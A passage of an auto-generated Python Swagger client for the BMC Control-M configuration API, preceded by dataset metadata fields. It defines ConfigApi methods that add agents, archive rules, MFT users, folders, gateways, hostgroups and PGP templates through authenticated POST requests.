| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a6e890aaf9f5bdd25c80578d729ab4a164c7f82
| 432,835
|
py
|
Python
|
controlm_py/api/config_api.py
|
dcompane/controlm_py
|
c521208be2f00303383bb32ca5eb2b7ff91999d3
|
[
"MIT"
] | 2
|
2020-03-20T18:24:23.000Z
|
2021-03-05T22:05:04.000Z
|
controlm_py/api/config_api.py
|
dcompane/controlm_py
|
c521208be2f00303383bb32ca5eb2b7ff91999d3
|
[
"MIT"
] | null | null | null |
controlm_py/api/config_api.py
|
dcompane/controlm_py
|
c521208be2f00303383bb32ca5eb2b7ff91999d3
|
[
"MIT"
] | 1
|
2021-05-27T15:54:37.000Z
|
2021-05-27T15:54:37.000Z
|
# coding: utf-8
"""
Control-M Services
Provides access to BMC Control-M Services # noqa: E501
OpenAPI spec version: 9.20.220
Contact: customer_support@bmc.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from controlm_py.api_client import ApiClient
class ConfigApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind this API facade to *api_client*; build a default ApiClient when omitted."""
    self.api_client = ApiClient() if api_client is None else api_client
def add_agent(self, body, server, **kwargs):  # noqa: E501
    """add agent to Server  # noqa: E501

    Define (not install or configure) an agent on the given Server.
    Synchronous by default; pass ``async_req=True`` to receive the request
    thread instead of the response data.

    :param async_req bool
    :param AddAgentParams body: (required)
    :param str server: The Server the agent is going to be added to. (required)
    :return: SuccessData, or the request thread when called asynchronously.
    """
    # Both the sync and async paths delegate to the same helper and return
    # its result unchanged, so one call covers both branches.
    kwargs['_return_http_data_only'] = True
    return self.add_agent_with_http_info(body, server, **kwargs)  # noqa: E501
def add_agent_with_http_info(self, body, server, **kwargs):  # noqa: E501
    """add agent to Server  # noqa: E501

    Add an agent to Server. This command does not install or configure the agent. It only defines the agent in the system.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_agent_with_http_info(body, server, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param AddAgentParams body: (required)
    :param str server: The Server the agent is going to be added to. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted for this endpoint plus client-level options.
    all_params = ['body', 'server']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: generated code snapshots locals() and folds **kwargs into it;
    # the local names 'self', 'body', 'server' and 'kwargs' are load-bearing.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_agent" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `add_agent`")  # noqa: E501
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `add_agent`")  # noqa: E501

    collection_formats = {}

    # URL template substitution: {server} in the endpoint path.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/server/{server}/agent', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_archive_rule(self, body, **kwargs):  # noqa: E501
    """Add Workload Archiving rule  # noqa: E501

    Create a new Workload Archiving rule.  Synchronous by default; pass
    ``async_req=True`` to receive the request thread instead.

    :param async_req bool
    :param ArchiveRule body: archive rule details to add (required)
    :return: SuccessData, or the request thread when called asynchronously.
    """
    # Both the sync and async paths delegate to the same helper and return
    # its result unchanged, so one call covers both branches.
    kwargs['_return_http_data_only'] = True
    return self.add_archive_rule_with_http_info(body, **kwargs)  # noqa: E501
def add_archive_rule_with_http_info(self, body, **kwargs):  # noqa: E501
    """Add Workload Archiving rule  # noqa: E501

    Add a new Workload Archiving rule  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_archive_rule_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ArchiveRule body: archive rule details to add (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted for this endpoint plus client-level options.
    all_params = ['body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: generated code snapshots locals() and folds **kwargs into it;
    # the local names 'self', 'body' and 'kwargs' are load-bearing.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_archive_rule" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `add_archive_rule`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/archive/rule', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_external_user(self, body, **kwargs):  # noqa: E501
    """Add and external user  # noqa: E501

    Add an external user for b2b.  Synchronous by default; pass
    ``async_req=True`` to receive the request thread instead.

    :param async_req bool
    :param ExternalUserData body: External user data (required)
    :return: SuccessData, or the request thread when called asynchronously.
    """
    # Both the sync and async paths delegate to the same helper and return
    # its result unchanged, so one call covers both branches.
    kwargs['_return_http_data_only'] = True
    return self.add_external_user_with_http_info(body, **kwargs)  # noqa: E501
def add_external_user_with_http_info(self, body, **kwargs):  # noqa: E501
    """Add and external user  # noqa: E501

    Add and external user for b2b  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_external_user_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ExternalUserData body: External user data (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted for this endpoint plus client-level options.
    all_params = ['body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: generated code snapshots locals() and folds **kwargs into it;
    # the local names 'self', 'body' and 'kwargs' are load-bearing.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_external_user" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `add_external_user`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/mft/externaluser', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_external_user_or_user_group_to_mft_folder(self, folder_name, user_or_group, **kwargs):  # noqa: E501
    """Add external user or user groups to virtual folder external users list.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the request
    thread instead.

    :param async_req bool
    :param str folder_name: Name of folder (required)
    :param str user_or_group: The user name or group name (required)
    :return: SuccessData, or the request thread when called asynchronously.
    """
    # Both the sync and async paths delegate to the same helper and return
    # its result unchanged, so one call covers both branches.
    kwargs['_return_http_data_only'] = True
    return self.add_external_user_or_user_group_to_mft_folder_with_http_info(folder_name, user_or_group, **kwargs)  # noqa: E501
def add_external_user_or_user_group_to_mft_folder_with_http_info(self, folder_name, user_or_group, **kwargs):  # noqa: E501
    """Add external user or user groups to virtual folder external users list.  # noqa: E501

    Add external user user groups to virtual folder external users list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_external_user_or_user_group_to_mft_folder_with_http_info(folder_name, user_or_group, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str folder_name: Name of folder (required)
    :param str user_or_group: The user name or group name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted for this endpoint plus client-level options.
    all_params = ['folder_name', 'user_or_group']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: generated code snapshots locals() and folds **kwargs into it; the
    # local names 'self', 'folder_name', 'user_or_group', 'kwargs' are load-bearing.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_external_user_or_user_group_to_mft_folder" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'folder_name' is set
    if ('folder_name' not in params or
            params['folder_name'] is None):
        raise ValueError("Missing the required parameter `folder_name` when calling `add_external_user_or_user_group_to_mft_folder`")  # noqa: E501
    # verify the required parameter 'user_or_group' is set
    if ('user_or_group' not in params or
            params['user_or_group'] is None):
        raise ValueError("Missing the required parameter `user_or_group` when calling `add_external_user_or_user_group_to_mft_folder`")  # noqa: E501

    collection_formats = {}

    # URL template substitution: snake_case params map to camelCase segments.
    path_params = {}
    if 'folder_name' in params:
        path_params['folderName'] = params['folder_name']  # noqa: E501
    if 'user_or_group' in params:
        path_params['userOrGroup'] = params['user_or_group']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # No request body for this endpoint.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/mft/virtualfolder/{folderName}/user/{userOrGroup}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_gateway(self, body, **kwargs):  # noqa: E501
    """add gateway.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the request
    thread instead.

    :param async_req bool
    :param GatewayData body: gateway data (required)
    :return: SuccessData, or the request thread when called asynchronously.
    """
    # Both the sync and async paths delegate to the same helper and return
    # its result unchanged, so one call covers both branches.
    kwargs['_return_http_data_only'] = True
    return self.add_gateway_with_http_info(body, **kwargs)  # noqa: E501
def add_gateway_with_http_info(self, body, **kwargs):  # noqa: E501
    """add gateway.  # noqa: E501

    add gateway.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_gateway_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param GatewayData body: gateway data (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted for this endpoint plus client-level options.
    all_params = ['body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # NOTE: generated code snapshots locals() and folds **kwargs into it;
    # the local names 'self', 'body' and 'kwargs' are load-bearing.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_gateway" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `add_gateway`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/mft/gateway', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_host_to_hostgroup(self, body, server, hostgroup, **kwargs):  # noqa: E501
    """add agent to hostgroup  # noqa: E501

    Add an agent to hostgroup. Create the hostgroup if it does not exist.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_host_to_hostgroup(body, server, hostgroup, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param AgentInHostgroup body: The hostname of the new agent (required)
    :param str server: The Server the hostgroup belongs to. (required)
    :param str hostgroup: The hostgroup name (required)
    :return: AgentsInGroupSuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always ask the delegate for the deserialized data only.  Whether the
    # call runs synchronously or returns a request thread is decided inside
    # *_with_http_info from the async_req flag, so a single delegation
    # covers both paths.
    kwargs['_return_http_data_only'] = True
    return self.add_host_to_hostgroup_with_http_info(body, server, hostgroup, **kwargs)  # noqa: E501
def add_host_to_hostgroup_with_http_info(self, body, server, hostgroup, **kwargs):  # noqa: E501
    """add agent to hostgroup  # noqa: E501

    Add an agent to hostgroup. Create the hostgroup if it does not exist.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_host_to_hostgroup_with_http_info(body, server, hostgroup, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param AgentInHostgroup body: The hostname of the new agent (required)
    :param str server: The Server the hostgroup belongs to. (required)
    :param str hostgroup: The hostgroup name (required)
    :return: AgentsInGroupSuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'body', 'server', 'hostgroup',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3; six.iteritems
    # is unnecessary here.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_host_to_hostgroup" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameters are set
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `add_host_to_hostgroup`")  # noqa: E501
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `add_host_to_hostgroup`")  # noqa: E501
    if params.get('hostgroup') is None:
        raise ValueError("Missing the required parameter `hostgroup` when calling `add_host_to_hostgroup`")  # noqa: E501

    collection_formats = {}

    # Path placeholders: /config/server/{server}/hostgroup/{hostgroup}/agent
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'hostgroup' in params:
        path_params['hostgroup'] = params['hostgroup']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/server/{server}/hostgroup/{hostgroup}/agent', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='AgentsInGroupSuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_hub_to_cluster(self, agentname, **kwargs):  # noqa: E501
    """add hub to cluster.  # noqa: E501

    add hub to cluster.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_hub_to_cluster(agentname, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str agentname: Agent name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_hub_to_cluster_with_http_info(agentname, **kwargs)  # noqa: E501
def add_hub_to_cluster_with_http_info(self, agentname, **kwargs):  # noqa: E501
    """add hub to cluster.  # noqa: E501

    add hub to cluster.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_hub_to_cluster_with_http_info(agentname, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str agentname: Agent name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'agentname',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_hub_to_cluster" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'agentname' is set
    if params.get('agentname') is None:
        raise ValueError("Missing the required parameter `agentname` when calling `add_hub_to_cluster`")  # noqa: E501

    collection_formats = {}

    # Path placeholder: /config/mft/cluster/hub/{agentname}
    path_params = {}
    if 'agentname' in params:
        path_params['agentname'] = params['agentname']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/mft/cluster/hub/{agentname}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_mft_folder(self, body, **kwargs):  # noqa: E501
    """Add virtual folder  # noqa: E501

    Add virtual folder  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_mft_folder(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param FolderPropertiesData body: virtual folder data (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_mft_folder_with_http_info(body, **kwargs)  # noqa: E501
def add_mft_folder_with_http_info(self, body, **kwargs):  # noqa: E501
    """Add virtual folder  # noqa: E501

    Add virtual folder  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_mft_folder_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param FolderPropertiesData body: virtual folder data (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'body',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_mft_folder" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'body' is set
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `add_mft_folder`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/mft/virtualfolder', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_mft_user_group(self, body, **kwargs):  # noqa: E501
    """Add user group.  # noqa: E501

    Add user group.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_mft_user_group(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param UserGroupPropertiesData body: User group object properties (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_mft_user_group_with_http_info(body, **kwargs)  # noqa: E501
def add_mft_user_group_with_http_info(self, body, **kwargs):  # noqa: E501
    """Add user group.  # noqa: E501

    Add user group.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_mft_user_group_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param UserGroupPropertiesData body: User group object properties (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'body',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_mft_user_group" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'body' is set
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `add_mft_user_group`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/mft/usergroup', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_pgp_template(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Add PGP Template  # noqa: E501

    Add PGP Template  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_pgp_template(body, server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param PgpTemplateData body: PGP Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The PGP Template Name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_pgp_template_with_http_info(body, server, agent, template_name, **kwargs)  # noqa: E501
def add_pgp_template_with_http_info(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Add PGP Template  # noqa: E501

    Add PGP Template  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_pgp_template_with_http_info(body, server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param PgpTemplateData body: PGP Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The PGP Template Name (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'body', 'server', 'agent', 'template_name',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_pgp_template" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameters are set
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `add_pgp_template`")  # noqa: E501
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `add_pgp_template`")  # noqa: E501
    if params.get('agent') is None:
        raise ValueError("Missing the required parameter `agent` when calling `add_pgp_template`")  # noqa: E501
    if params.get('template_name') is None:
        raise ValueError("Missing the required parameter `template_name` when calling `add_pgp_template`")  # noqa: E501

    collection_formats = {}

    # Path placeholders; note the python snake_case name maps to the
    # camelCase `templateName` placeholder in the route.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501
    if 'template_name' in params:
        path_params['templateName'] = params['template_name']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_remote_host(self, server, **kwargs):  # noqa: E501
    """add remote host to Server  # noqa: E501

